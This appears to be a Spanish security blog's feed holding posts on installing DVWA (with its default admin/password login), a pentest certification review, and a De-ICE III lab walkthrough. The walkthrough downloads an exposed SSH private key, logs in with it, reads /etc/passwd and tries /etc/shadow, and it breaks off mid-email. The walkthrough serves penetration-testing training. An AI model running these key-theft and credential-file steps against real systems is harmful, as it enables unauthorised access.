<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img810.imageshack.us/img810/2550/91526082.jpg" alt="" width="550" height="322" /></p>
<p style="text-align: justify;">Si escribimos dicha dirección IP en nuestro navegador, nos encontraremos con la página de login de <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA</strong></a>.</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img9.imageshack.us/img9/76/99122739.jpg" alt="" width="421" height="372" />Además si deseamos podemos trabajar desde el propio LiveCD, para ello simplemente ejecutamos el entorno gráfico de <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA </strong></a>y el navegador web. Este automáticamente abrirá la página de login del Framework.</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img178.imageshack.us/img178/990/67182520.jpg" alt="" width="550" height="501" /></p>
<p style="text-align: justify;">Iniciamos sesión en <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA </strong></a>(<strong>user:</strong> <em>admin</em> <strong>pass:</strong><em> password</em>) y nos encontraremos con todos los módulos de entrenamiento.</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img638.imageshack.us/img638/747/60871223.jpg" alt="" width="550" height="325" /></p>
<p style="text-align: justify;">Veamos ahora el mismo proceso de configuración y puesta en marcha en el software para virtualziación Virtual Box.</p>
<p style="text-align: justify;">Creación de nueva máquina y configuración de acceso a red (en mi caso NAT)</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img214.imageshack.us/img214/2594/17249277.jpg" alt="" width="480" height="358" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img840.imageshack.us/img840/9311/51841408.jpg" alt="" width="550" height="405" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img256.imageshack.us/img256/8585/37647166.jpg" alt="" width="547" height="396" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img835.imageshack.us/img835/3458/97564122.jpg" alt="" width="456" height="405" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img834.imageshack.us/img834/6610/24159294.jpg" alt="" width="398" height="376" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img19.imageshack.us/img19/3082/32529704.jpg" alt="" width="512" height="317" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img22.imageshack.us/img22/2127/41726645.jpg" alt="" width="362" height="348" /></p>
<p style="text-align: justify;">Si ejecutamos el browser desde la misma máquina en virtual box, nos encontraremos igualmente con la página de inicio del <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA</strong></a>.</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img214.imageshack.us/img214/7169/98589516.jpg" alt="" width="550" height="505" /></p>
<p style="text-align: justify;">Finalmente veamos el proceso de implementación de <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA </strong></a>en QEMU</p>
<p style="text-align: justify;">Desde el Qemu Manager</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img411.imageshack.us/img411/9506/96461598.jpg" alt="" width="369" height="360" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img205.imageshack.us/img205/139/27835991.jpg" alt="" width="550" height="420" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img828.imageshack.us/img828/9051/32829908.jpg" alt="" width="534" height="380" /></p>
<p style="text-align: justify;">Seleccionamos la mejor opción que se acomode a nuestras caracteristicas de red. En mi caso decidí utilizar una interfaz virtual (tap qemu).</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img688.imageshack.us/img688/487/27790988.jpg" alt="" width="194" height="361" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img684.imageshack.us/img684/9352/17639433.jpg" alt="" width="273" height="279" /></p>
<p style="text-align: justify;">Continuamos con la configuración normal, seleccionado la imagen ISO de <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA</strong></a></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img823.imageshack.us/img823/9104/89530523.jpg" alt="" width="379" height="312" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img641.imageshack.us/img641/1882/44693529.jpg" alt="" width="421" height="338" />Verificamos el acceso</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img687.imageshack.us/img687/7445/19772447.jpg" alt="" width="550" height="348" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img841.imageshack.us/img841/697/18936833.jpg" alt="" width="550" height="441" /></p>
<p style="text-align: justify;">En próximos post veremos como realizar uno a uno cada módulo de entrenamiento&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/implementacion-de-damn-vulnerable-web-application-con-vmware-qemu-y-virtualbox/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>DVWA &#8211; Framework de Entrenamiento en Explotación de Seguridad Web</title>
		<link>http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web</link>
		<comments>http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web#comments</comments>
		<pubDate>Mon, 13 Sep 2010 22:43:54 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Blind SQL Injection]]></category>
		<category><![CDATA[DVWA]]></category>
		<category><![CDATA[LFI]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[RFI]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[Web Application Security]]></category>
		<category><![CDATA[XSRF]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=20</guid>
		<description><![CDATA[DVWA (Damn Vulnerable Web Application) es un reconocido entorno de entrenamiento en explotación de  seguridad Web, que permite estudiar e investigar sobre las diferentes temáticas involucradas en dicho campo. Ahora se encuentra disponible la versión número 1.0.7, y desde hace algún tiempo se distribuye, además de los archivos , un LiveCD (iso) para facilitar aun [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.dvwa.co.uk/" target="_blank"><strong>DVWA (Damn Vulnerable Web Application)</strong></a> es un reconocido entorno de entrenamiento en explotación de  seguridad Web, que permite estudiar e investigar sobre las diferentes temáticas involucradas en dicho campo.</p>
<p style="text-align: justify;">Ahora se encuentra disponible la versión número 1.0.7, y desde hace algún tiempo se distribuye, además de los archivos , un LiveCD (iso) para facilitar aun más la implementación del entorno de entrenamiento.</p>
<p style="text-align: justify;">Entre las mejoras de esta nueva versión, se destaca la página de ayuda del entorno, la implementación de las prácticas de Blind SQL Injection y la documentación oficial del proyecto.</p>
<p style="text-align: justify;">Las temáticas cubiertas en el Framework, son las siguientes:</p>
<p style="text-align: justify;">Login Brute Force<br />
XSS (Cross-Site Scripting)<br />
LFI (Local File Inclusion)<br />
RFI (Remote File Inclusion)<br />
Command Execution<br />
Upload Script<br />
CSRF (Cross-Site Remote Forgery)<br />
SQL Injection<br />
Blind SQL Injection</p>
<p style="text-align: justify;"><a href="http://www.ethicalhack3r.co.uk/" target="_blank"><strong>Para más información sobre el proyecto Blog &gt;&gt; </strong></a></p>
<p style="text-align: justify;"><a href="http://www.dvwa.co.uk/" target="_blank"><strong>Web Oficial del Proyecto &gt;&gt;</strong></a></p>
<p style="text-align: justify;"><a href="http://www.dvwa.co.uk/DVWA-1.0.7.iso" target="_blank"><strong>Descargar DVWA (ISO)(480Mb) &gt;&gt;</strong></a></p>
<p style="text-align: justify;"><strong>Pronto estaré publicando algunos tutoriales y video tutoriales de la implementación y desarrollo de cada uno de los niveles propuestos en el Framework, obviamente estos recursos serán generados a través de la lista de correo y de los comentarios en el Blog.<br />
</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Certified Professional Penetration Tester</title>
		<link>http://www.sec-track.com/certified-professional-penetration-tester</link>
		<comments>http://www.sec-track.com/certified-professional-penetration-tester#comments</comments>
		<pubDate>Thu, 26 Aug 2010 09:48:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Certificaciones]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=744</guid>
		<description><![CDATA[Muy pocas veces hablo sobre mis certificaciones o preparación formal realizada. Esto sobre todo, por el hecho de que no soy  amante de los altos egos de algunos con respecto a estos temas. Otra razón muy importante es debido a que el hecho de tener una certificación o carrera profesional no garantiza en su totalidad [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Muy pocas veces hablo sobre mis certificaciones o preparación formal realizada. Esto sobre todo, por el hecho de que no soy  amante de los altos egos de algunos con respecto a estos temas. Otra razón muy importante es debido a que el hecho de tener una certificación o carrera profesional no garantiza en su totalidad que una persona tenga o no, los conocimientos necesarios para ejercer una labor. Soy de los que piensan que nada mejor que la práctica pura y dura para evaluar la experticia de las personas. Como decimos por ahí, &#8220;la práctica hace al maestro&#8221;.</p>
<p style="text-align: justify;">Toco este tema, debido a que a lo largo de mi carrera profesional e investigaciones relacionadas en la seguridad de la información, he realizado diferentes certificaciones y preparaciones formales en estos campos. Una de estas corresponde al título de este post.</p>
<p style="text-align: justify;">Esta prestigiosa certificación y que muchos se atreven a nombrar como &#8220;<strong>Penetration Testing Pro: the CEH killer</strong>&#8221; es ofrecida por el equipo de <a href="http://www.elearnsecurity.com" target="_blank"><strong>eLearnSecurity</strong></a> en un completo paquete de entrenamiento + certificación. El objetivo a lo largo de esta exigente preparación es aprender trabajando de manera práctica en cada uno de sus módulos propuestos.</p>
<p style="text-align: justify;"><strong>SECTION 1 WEB APPLICATION SECURITY TESTING<br />
OVERVIEW</strong></p>
<ul style="text-align: justify;">
<li>Module 1: Introduction</li>
<li>Module 2: Information Gathering</li>
<li>Module 3: Vulnerability assessment</li>
<li>Module 4: Cross site scripting</li>
<li>Module 5: SQL Injection</li>
<li>Module 6: Advanced Web Attacks</li>
</ul>
<p style="text-align: justify;"><strong>SECTION 2 NETWORK SECURITY TESTING<br />
OVERVIEW</strong></p>
<ul style="text-align: justify;">
<li>Module 1: Information Gathering</li>
<li>Module 2: Scanning</li>
<li>Module 3: Enumeration</li>
<li>Module 4: Sniffing and MITM attacks</li>
<li>Module 5: The Exploitation show</li>
<li>Module 6: Anonymity</li>
</ul>
<p style="text-align: justify;"><strong>SECTION 3 SYSTEM SECURITY<br />
OVERVIEW</strong></p>
<ul style="text-align: justify;">
<li>Module 1: Introduction</li>
<li>Module 2: Cryptography and Password Cracking</li>
<li>Module 3: Buffer Overflow</li>
<li>Module 4: Shellcoding</li>
<li>Module 5: Malware</li>
<li>Module 6: Rootkit coding</li>
</ul>
<p style="text-align: justify;"><strong>Los detalles del curso son:</strong></p>
<ul style="text-align: justify;">
<li>Online course—learn at your own pace</li>
<li>1000+ interactive slides</li>
<li>Learn methodology, be a professional</li>
<li>4 hours of videos</li>
<li>3 authors—3 sections</li>
<li>DVD Backtrack4 + Labs</li>
<li>Silver Certification</li>
<li>Qualifies you for 40 CPE</li>
</ul>
<p style="text-align: justify;">Un completo listado de las temáticas puede encontrarse en el <a href="http://www.elearnsecurity.com/course/penetration_testing/syllabus.pdf" target="_blank"><strong>documento Syllabus oficial</strong></a>.</p>
<p style="text-align: justify;">Además de esto, en el web site <a href="http://www.ethicalhacker.net/content/view/307/24/" target="_blank"><strong>The Ethical Network</strong></a> y en <a href="http://www.darknet.org.uk/2010/05/elearnsecurity-online-penetration-testing-training/" target="_blank"><strong>DarkNet </strong></a>han realizado unos completos reviews sobre el entrenamiento y la certificación, que puede ser de utilidad para quienes estén interesados en realizar este training.</p>
<p style="text-align: justify;">Por este mismo medio estaré publicando mis experiencias, alguna parte del material de entrenamiento (videos, ppts, entornos, sources) y algunos de los ejercicios propuestos, con el objetivo de encontrar otras opiniones, sugerencias y compartir con quienes quieran parte de este valioso recurso y estén proyectando realizarlo de manera oficial.</p>
<p style="text-align: justify;"><a href="http://www.elearnsecurity.com" target="_blank"><strong>Web oficial (Entrenamiento + Certificación) eLearnSecurity</strong></a></p>
<p style="text-align: justify;"><a href="http://www.elearnsecurity.com/course/penetration_testing/preview/player.html" target="_blank"><strong>Demo Training</strong></a></p>
<p style="text-align: justify;"><strong><a href="http://www.darknet.org.uk/2010/05/elearnsecurity-online-penetration-testing-training/" target="_blank">Review (DarkNet)</a></strong></p>
<p style="text-align: justify;"><a href="http://www.ethicalhacker.net/content/view/307/24/" target="_blank"><strong>Review (The Ethical Hacker Network)</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/certified-professional-penetration-tester/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Desarrollo del entorno De-Ice III – Acceso al Sistema y Elevación de Privilegios</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios#comments</comments>
		<pubDate>Tue, 01 Jun 2010 11:11:08 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[john the ripper]]></category>
		<category><![CDATA[passwd]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[shadow]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=520</guid>
		<description><![CDATA[Continúa desde: Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades Veamos ahora que podemos hacer con la información encontrada: Index of /~pirrip//.ssh Name Last modified Size Description Parent Directory - id_rsa 05-Jan-2008 20:29 1.6K id_rsa.pub 05-Jan-2008 20:29 393 Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80 Esta información corresponde a [...]]]></description>
			<content:encoded><![CDATA[<p>Continúa desde: <strong><a title="Permanent Link to Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades" rel="bookmark" href="../desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades">Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades</a></strong></p>
<p>Veamos ahora que podemos hacer con la información encontrada:</p>
<h1>Index of /~pirrip//.ssh</h1>
<pre><img src="http://192.168.2.101/icons/blank.gif" alt="Icon " /> Name                    Last modified      Size  Description
<hr /><img src="http://192.168.2.101/icons/back.gif" alt="[DIR]" /> Parent Directory                             -
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa                  05-Jan-2008 20:29  1.6K
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa.pub              05-Jan-2008 20:29  393
<hr /></pre>
<address>Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80</address>
<address> </address>
<p style="text-align: justify;"><span id="more-520"></span>Esta información corresponde a la llave digital de acceso del usuario pirrip, muy posiblemente al realizarse la copia de seguridad previa a la migración del sistema, esta se olvidó en el antiguo server.</p>
<p>Descarguemos los archivos:</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa.pub</strong><br />
&#8211;2010-06-01 02:11:32&#8211;  http://192.168.2.101/~pirrip//.ssh/id_rsa.pub<br />
Connecting to 192.168.2.101:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 393 [text/plain]<br />
Saving to: `id_rsa.pub&#8217;</p>
<p>100%[===========================================================&gt;] 393         &#8211;.-K/s   in 0s</p>
<p>2010-06-01 02:11:32 (44.7 MB/s) &#8211; `id_rsa.pub&#8217; saved [393/393]</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa</strong><br />
&#8211;2010-06-01 02:11:46&#8211;  http://192.168.2.101/~pirrip//.ssh/id_rsa<br />
Connecting to 192.168.2.101:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 1675 (1.6K) [text/plain]<br />
Saving to: `id_rsa&#8217;</p>
<p>100%[===========================================================&gt;] 1,675       &#8211;.-K/s   in 0s</p>
<p>2010-06-01 02:11:46 (172 MB/s) &#8211; `id_rsa&#8217; saved [1675/1675]</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# ls</strong><br />
id_rsa  id_rsa.pub</p>
<p>Una vez descargadas las llaves, procedemos a copiarlas al directorio /foo/.ssh</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# cp id* /root/.ssh/</strong></p>
<p><strong>root@Sec-Track:~/.ssh# ls</strong><br />
id_rsa  id_rsa.pub  known_hosts</p>
<p>Confirmamos que la llave corresponde al usuario pirrip</p>
<p><strong>root@Sec-Track:~/.ssh# more id_rsa.pub</strong><br />
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA1pfb/CVukUw4Xe67YLEZzVHWNax0zJjI1CfcsoEGylmm<br />
tlA6iXHi41nLshzXu9n536JfM9LFAWGqefBVX7Bzd/fC4+jHS3q89IK9FP7gFPwEmlNHCwPX0ADxDFyB<br />
1lJOFffJ9gVw3VgHCaCPgS70UqJD0hZFDMSDMoBa91PylFQR0m58nMq8DsGRbeC5hTdpLXKfBuW8v/lF<br />
uNEWVWNcZDie82aiJg8WRUUIrzeGZSR3+cG1hi6za67VIi+ce8fFuBvIgaEpvJ0JSIX7zPLUV10ezW1N<br />
QRNplKSam3TIYI3+YwuhlcgpEyliHYReN6v91+um2c6LNy9y/vx2Akci5Q== <strong>pirrip@slax</strong></p>
<p>Por lo tanto realicemos la conexión al sistema objetivo!!</p>
<p><strong>root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100</strong><br />
The authenticity of host &#8217;192.168.2.100 (192.168.2.100)&#8217; can&#8217;t be established.<br />
RSA key fingerprint is ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10.<br />
Are you sure you want to continue connecting (yes/no)? yes<br />
Warning: Permanently added &#8217;192.168.2.100&#8242; (RSA) to the list of known hosts.<br />
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br />
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @<br />
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br />
Permissions 0644 for &#8216;/root/.ssh/id_rsa&#8217; are too open.<br />
It is recommended that your private key files are NOT accessible by others.<br />
This private key will be ignored.<br />
bad permissions: ignore key: /root/.ssh/id_rsa<br />
pirrip@192.168.2.100&#8242;s password:</p>
<p>Como vemos las llaves presentan un error de permisos&#8230; Por lo tanto cambiemos estos:</p>
<p><strong>root@Sec-Track:~/.ssh# ls -la</strong><br />
total 20<br />
drwx&#8212;&#8212;  2 root root 4096 Jun  1 02:18 .<br />
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..<br />
<strong>-r&#8211;r&#8211;r&#8211; </strong> 1 root root 1675 Jun  1 02:17 id_rsa<br />
<strong>-r&#8211;r&#8211;r&#8211;</strong> 1 root root  393 Jun  1 02:17 id_rsa.pub<br />
-rw-r&#8211;r&#8211;  1 root root 1768 Jun  1 02:21 known_hosts<br />
<strong>root@Sec-Track:~/.ssh# chmod 000 id*</strong><br />
<strong>root@Sec-Track:~/.ssh# ls -l</strong>a<br />
total 20<br />
drwx&#8212;&#8212;  2 root root 4096 Jun  1 02:18 .<br />
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..<br />
<strong>&#8212;&#8212;&#8212;-</strong> 1 root root 1675 Jun  1 02:17 id_rsa<br />
<strong>&#8212;&#8212;&#8212;-</strong> 1 root root  393 Jun  1 02:17 id_rsa.pub<br />
-rw-r&#8211;r&#8211;  1 root root 1768 Jun  1 02:21 known_hosts</p>
<p>Ahora si&#8230; Conectémonos al host</p>
<p><strong>root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100</strong><br />
Linux 2.6.16.<br />
pirrip@slax:~$</p>
<p style="text-align: justify;">Muy bien&#8230; Ya estamos dentro del sistema objetivo&#8230; Ahora como en  todos los Test de Penetración que hemos realizado, tratemos de escalar privilegios.</p>
<p><strong>pirrip@slax:~$ cat /etc/passwd</strong><br />
<strong>root</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :0:0::/root:/bin/bash<br />
bin:x:1:1:bin:/bin:<br />
daemon:x:2:2:daemon:/sbin:<br />
adm:x:3:4:adm:/var/log:<br />
lp:x:4:7:lp:/var/spool/lpd:<br />
sync:x:5:0:sync:/sbin:/bin/sync<br />
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br />
halt:x:7:0:halt:/sbin:/sbin/halt<br />
mail:x:8:12:mail:/:<br />
news:x:9:13:news:/usr/lib/news:<br />
uucp:x:10:14:uucp:/var/spool/uucppublic:<br />
operator:x:11:0:operator:/root:/bin/bash<br />
games:x:12:100:games:/usr/games:<br />
ftp:x:14:50::/home/ftp:<br />
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:<br />
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash<br />
rpc:x:32:32:RPC portmap user:/:/bin/false<br />
sshd:x:33:33:sshd:/:<br />
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash<br />
pop:x:90:90:POP:/:<br />
nobody:x:99:99:nobody:/:<br />
<strong>pirrip</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :1000:<strong>10</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> hilip Pirrip:/home/pirrip:/bin/bash<br />
<strong>magwitch</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :1001:100:Abel Magwitch:/home/magwitch:/bin/bash<br />
<strong>havisham</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :1002:100:Estella Havisham:/home/havisham:/bin/bash</p>
<p style="text-align: justify;">Vemos como nuestro usuario pirrip tiene el ID 10&#8230; Comprobemos entonces los grupos.</p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ cat /etc/group</strong><br />
root::0:root<br />
bin::1:root,bin,daemon<br />
daemon::2:root,bin,daemon<br />
sys::3:root,bin,adm<br />
adm::4:root,adm,daemon<br />
tty::5:<br />
disk::6:root,adm<br />
lp::7:lp<br />
mem::8:<br />
kmem::9:<br />
<strong>wheel::10:root</strong><br />
floppy::11:root<br />
mail::12:mail<br />
news::13:news<br />
uucp::14:uucp<br />
man::15:<br />
audio::17:<br />
video::18:<br />
cdrom::19:<br />
games::20:<br />
slocate::21:<br />
utmp::22:<br />
smmsp::25:smmsp<br />
mysql::27:<br />
rpc::32:<br />
sshd::33:sshd<br />
gdm::42:<br />
shadow::43:<br />
ftp::50:<br />
pop::90:pop<br />
scanner::93:<br />
nobody::98:nobody<br />
nogroup::99:<br />
users::100:<br />
console::101:</p>
<p style="text-align: justify;">Por lo tanto podremos utilizar el comando <strong>sudo</strong></p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ cat /etc/shadow</strong><br />
cat: /etc/shadow: Permission denied</p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ sudo cat /etc/shadow</strong></p>
<p>We trust you have received the usual lecture from the local System<br />
Administrator. It usually boils down to these three things:</p>
<p>#1) Respect the privacy of others.<br />
#2) Think before you type.<br />
#3) With great power comes great responsibility.</p>
<p>Password:</p>
<p style="text-align: justify;">Lamentablemente desconocemos nuestro password.</p>
<p style="text-align: justify;">Ahora observaremos en detalle la versión del sistema objetivo y trataremos identificar alguna vulnerabilidad reportada, ubicar algún exploit y ejecutarlo desde la carpeta /tmp</p>
<p><strong>pirrip@slax:~$ uname -r</strong><br />
2.6.16<br />
<strong>pirrip@slax:~$ cd /tmp/</strong><br />
You have mail in /var/mail/pirrip</p>
<p>Para nuestra sorpresa, cuando decidí cambiarme a la carpeta /tmp recibí el mensaje de que tengo un email &#8230; Veamos de que se trata</p>
<p><strong>pirrip@slax:/tmp$ mail</strong><br />
mailx version nail 11.25 7/29/05.  Type ? for help.<br />
&#8220;/var/mail/pirrip&#8221;: 7 messages 7 unread<br />
&gt;U  1 Abel Magwitch      Sun Jan 13 23:53   21/758   Estella<br />
U  2 Estella Havisham   Sun Jan 13 23:53   21/790   welcome to the team<br />
U  3 Abel Magwitch      Sun Jan 13 23:53   21/885   havisham<br />
U  4 Estella Havisham   Mon Jan 14 00:05   21/871   next month<br />
U  5 Abel Magwitch      Mon Jan 14 00:05   21/878   vacation<br />
U  6 Abel Magwitch      Mon Jan 14 00:05   21/925   vacation<br />
U  7 noreply@fermion.he Mon Jan 14 00:05   30/993   Fermion Account Login Reminder<br />
? 1<br />
<strong>Message  1:</strong><br />
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:47:48 +0000<br />
To: pirrip@slax.example.net<br />
Subject: Estella<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Will do.</p>
<p>?<br />
<strong>Message  2:</strong><br />
From havisham@slax.example.net  Sun Jan 13 23:53:37 2008<br />
Return-Path: &lt;havisham@slax.example.net&gt;<br />
From: Estella Havisham &lt;havisham@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:50:33 +0000<br />
To: pirrip@slax.example.net<br />
Subject: welcome to the team<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Thanks!  Glad to be here.</p>
<p>?<br />
<strong>Message  3:</strong><br />
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:48:57 +0000<br />
To: pirrip@slax.example.net<br />
Subject: havisham<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>I set her up with an accountus servers.  I set her password to &#8220;<strong>changeme</strong>&#8221; and will swing by tomorrow and make sure she changes her pw.</p>
<p>?<br />
<strong>Message  4:</strong><br />
From havisham@slax.example.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;havisham@slax.example.net&gt;<br />
From: Estella Havisham &lt;havisham@slax.example.net&gt;<br />
Date: Mon, 14 Jan 2008 00:03:56 +0000<br />
To: pirrip@slax.example.net<br />
Subject: next month<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Abel filled me in about next month.  I wanted to ask you if I can grab the week you get back for vacation?  Thanks.</p>
<p>?<br />
<strong>Message  5:</strong><br />
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:55:41 +0000<br />
To: pirrip@slax.example.net<br />
Subject: vacation<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Hey, I&#8217;ll be taking vacation the second week of next month.  Have any additional tasks that need to be taen care of in advance?</p>
<p>?<br />
<strong>Message  6:</strong><br />
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:58:28 +0000<br />
To: pirrip@slax.example.net<br />
Subject: vacation<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Sure &#8211; so far, she&#8217;s doing just fine.  I have assigned her a couple web issues and the ftp installation for 2.100.  She seems to be very comfortable, even with the new stuff.</p>
<p>?<br />
<strong>Message  7:</strong><br />
From noreply@fermion.herot.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;noreply@fermion.herot.net&gt;<br />
From: noreply@fermion.herot.net<br />
Date: Sun, 13 Jan 2008 23:54:42 +0000<br />
To: pirrip@slax.example.net<br />
Subject: Fermion Account Login Reminder<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Fermion Account Login Reminder</p>
<p>Listed below are your Fermion Account login credentials.  Please let us know if you have any questions or problems.</p>
<p>Regards,<br />
Fermion Support<br />
<strong><br />
